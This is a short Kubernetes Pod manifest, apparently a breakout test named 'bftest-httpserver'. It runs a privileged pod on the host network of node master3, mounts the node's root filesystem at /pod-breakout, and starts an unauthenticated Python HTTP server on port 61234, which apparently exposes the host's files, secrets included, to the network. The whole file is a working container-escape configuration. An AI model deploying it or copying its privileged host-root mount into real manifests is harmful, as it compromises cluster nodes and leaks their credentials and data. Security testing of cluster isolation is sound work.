apiVersion: v1
kind: Pod
metadata:
  name: bftest-httpserver
  labels:
    app: bftest-httpserver
spec:
  #nodeSelector:
  #  kubernetes.io/hostname: master3
  nodeName: master3
  hostNetwork: true
  containers:
  - name: bftest-httpserver
    image: python
    ports:
      - name: web
        containerPort: 61234
        protocol: TCP
    command: [ "/bin/sh", "-c", "python3 -m http.server 61234" ]
    securityContext:
       privileged: true
    volumeMounts:
      - mountPath: /pod-breakout
        name: noderoot
  volumes:
  - name: noderoot
    hostPath:
      path: /